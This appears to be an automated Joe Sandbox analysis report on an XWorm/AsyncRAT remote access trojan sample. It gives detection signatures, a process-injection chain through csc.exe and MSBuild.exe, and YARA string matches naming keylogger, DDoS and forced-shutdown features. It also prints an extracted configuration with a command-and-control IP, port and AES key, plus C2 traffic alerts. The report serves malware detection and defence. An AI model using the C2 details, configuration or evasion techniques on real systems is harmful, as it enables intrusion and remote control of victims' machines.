Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
Analysis ID:1631870
MD5:918f83cd6d935bd729990142f8e276e0
SHA1:bd15b5a29a83b86d1ab177f16f6d0f3a54dc6741
SHA256:8f8830b812c8f50559cddc20140148f16c2c6681b8087da382aab91a1d22e088
Tags:AsyncRATexeuser-SecuriteInfoCom
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Malware Callback Communication
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe (PID: 3004 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe" MD5: 918F83CD6D935BD729990142F8E276E0)
    • csc.exe (PID: 2028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2548 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20EF.tmp" "c:\Users\user\AppData\Local\Temp\p5qmaywt\CSC46F8F09A99C548C6BA2229A8BF601D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 5668 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 1304 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
{"C2 url": ["185.7.214.211"], "Port": 4444, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dllJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dllrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x5ea9:$str01: $VB$Local_Port
    • 0x5e9a:$str02: $VB$Local_Host
    • 0x61a0:$str03: get_Jpeg
    • 0x5b52:$str04: get_ServicePack
    • 0x6b46:$str05: Select * from AntivirusProduct
    • 0x6d44:$str06: PCRestart
    • 0x6d58:$str07: shutdown.exe /f /r /t 0
    • 0x6e0a:$str08: StopReport
    • 0x6de0:$str09: StopDDos
    • 0x6ed6:$str10: sendPlugin
    • 0x6f56:$str11: OfflineKeylogger Not Enabled
    • 0x70ae:$str12: -ExecutionPolicy Bypass -File "
    • 0x71d7:$str13: Content-length: 5235
    C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dllMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7280:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x731d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7432:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x70f2:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmprat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0x5ea9:$str01: $VB$Local_Port
      • 0x5e9a:$str02: $VB$Local_Host
      • 0x61a0:$str03: get_Jpeg
      • 0x5b52:$str04: get_ServicePack
      • 0x6b46:$str05: Select * from AntivirusProduct
      • 0x6d44:$str06: PCRestart
      • 0x6d58:$str07: shutdown.exe /f /r /t 0
      • 0x6e0a:$str08: StopReport
      • 0x6de0:$str09: StopDDos
      • 0x6ed6:$str10: sendPlugin
      • 0x6f56:$str11: OfflineKeylogger Not Enabled
      • 0x70ae:$str12: -ExecutionPolicy Bypass -File "
      • 0x71d7:$str13: Content-length: 5235
      00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7280:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x731d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7432:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x70f2:$cnc4: POST / HTTP/1.1
      00000001.00000003.1194534109.0000000005866000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000001.00000003.1194534109.0000000005866000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xe130:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xe1cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xe2e2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xdfa2:$cnc4: POST / HTTP/1.1
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x5ea9:$str01: $VB$Local_Port
          • 0x5e9a:$str02: $VB$Local_Host
          • 0x61a0:$str03: get_Jpeg
          • 0x5b52:$str04: get_ServicePack
          • 0x6b46:$str05: Select * from AntivirusProduct
          • 0x6d44:$str06: PCRestart
          • 0x6d58:$str07: shutdown.exe /f /r /t 0
          • 0x6e0a:$str08: StopReport
          • 0x6de0:$str09: StopDDos
          • 0x6ed6:$str10: sendPlugin
          • 0x6f56:$str11: OfflineKeylogger Not Enabled
          • 0x70ae:$str12: -ExecutionPolicy Bypass -File "
          • 0x71d7:$str13: Content-length: 5235
          0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x7280:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x731d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x7432:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x70f2:$cnc4: POST / HTTP/1.1
          5.2.MSBuild.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            5.2.MSBuild.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x58a9:$str01: $VB$Local_Port
            • 0x589a:$str02: $VB$Local_Host
            • 0x5ba0:$str03: get_Jpeg
            • 0x5552:$str04: get_ServicePack
            • 0x6546:$str05: Select * from AntivirusProduct
            • 0x6744:$str06: PCRestart
            • 0x6758:$str07: shutdown.exe /f /r /t 0
            • 0x680a:$str08: StopReport
            • 0x67e0:$str09: StopDDos
            • 0x68d6:$str10: sendPlugin
            • 0x6956:$str11: OfflineKeylogger Not Enabled
            • 0x6aae:$str12: -ExecutionPolicy Bypass -File "
            • 0x6bd7:$str13: Content-length: 5235
            Click to see the 49 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.7.214.211, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1304, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49714
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, ParentProcessId: 3004, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline", ProcessId: 2028, ProcessName: csc.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, ProcessId: 3004, TargetFilename: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, ParentProcessId: 3004, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline", ProcessId: 2028, ProcessName: csc.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:48:59.284070+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:49:02.231313+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:49:13.656588+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:49:28.029903+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:49:32.246291+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:49:42.407425+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:49:48.310842+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:49:56.309536+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:02.249172+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:02.428644+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:10.780042+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:18.389485+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:24.217774+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:28.701696+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:32.233376+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:33.889209+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:44.311764+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:44.514271+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:45.483894+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:49.717875+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:49.846824+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:49.975019+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:50.103705+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:50:54.483177+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:00.311329+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:02.249690+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:14.685891+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:26.405679+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:31.842315+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:31.971134+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:32.246700+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:37.049030+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:42.547160+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:53.123930+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:53.252555+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:51:53.570316+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:00.843806+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:02.231626+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:03.655272+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:03.784376+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:05.925139+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:07.826495+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:08.654939+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:08.783597+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:13.904861+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:14.045536+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:18.016420+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:24.967821+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:30.343559+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:32.232182+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:32.624498+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:40.626738+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:42.670756+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            2025-03-07T16:52:45.233111+010028528701Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:48:59.331053+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:49:13.658807+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:49:28.036300+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:49:42.409639+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:49:48.321697+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:49:56.311659+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:02.431695+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:10.785367+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:18.391665+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:24.219871+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:28.706742+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:33.890856+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:44.314726+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:44.518543+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:45.487002+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:49.720098+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:49.848319+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:49.976482+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:50.105164+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:50:54.488495+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:00.312880+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:14.687566+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:26.408630+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:31.844979+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:31.973723+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:37.054993+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:42.549319+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:53.126918+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:53.254414+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:51:53.574670+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:00.845759+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:03.657480+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:03.786477+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:05.927569+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:07.828601+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:08.661099+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:08.785678+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:13.913159+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:14.047353+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:18.018504+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:24.972225+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:30.346572+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:32.628523+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:40.635499+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:42.672503+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            2025-03-07T16:52:45.234012+010028529231Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:49:02.231313+010028588011Malware Command and Control Activity Detected185.7.214.2114444192.168.2.449714TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:51:52.899632+010028587991Malware Command and Control Activity Detected192.168.2.449714185.7.214.2114444TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeAvira: detected
            Source: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dllAvira: detection malicious, Label: TR/Dropper.Gen7
            Source: 00000005.00000002.3637415749.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["185.7.214.211"], "Port": 4444, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeVirustotal: Detection: 48%Perma Link
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeReversingLabs: Detection: 36%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpString decryptor: 185.7.214.211
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpString decryptor: 4444
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpString decryptor: P0WER
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpString decryptor: XWorm
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpString decryptor: USB.exe
            Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49718 version: TLS 1.2
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.pdb source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.pdb source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1203287208.0000000000994000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49714 -> 185.7.214.211:4444
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.7.214.211:4444 -> 192.168.2.4:49714
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49714 -> 185.7.214.211:4444
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 185.7.214.211:4444 -> 192.168.2.4:49714
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49714 -> 185.7.214.211:4444
            Source: Malware configuration extractorURLs: 185.7.214.211
            Source: global trafficTCP traffic: 192.168.2.4:49714 -> 185.7.214.211:4444
            Source: Joe Sandbox ViewASN Name: DELUNETDE DELUNETDE
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
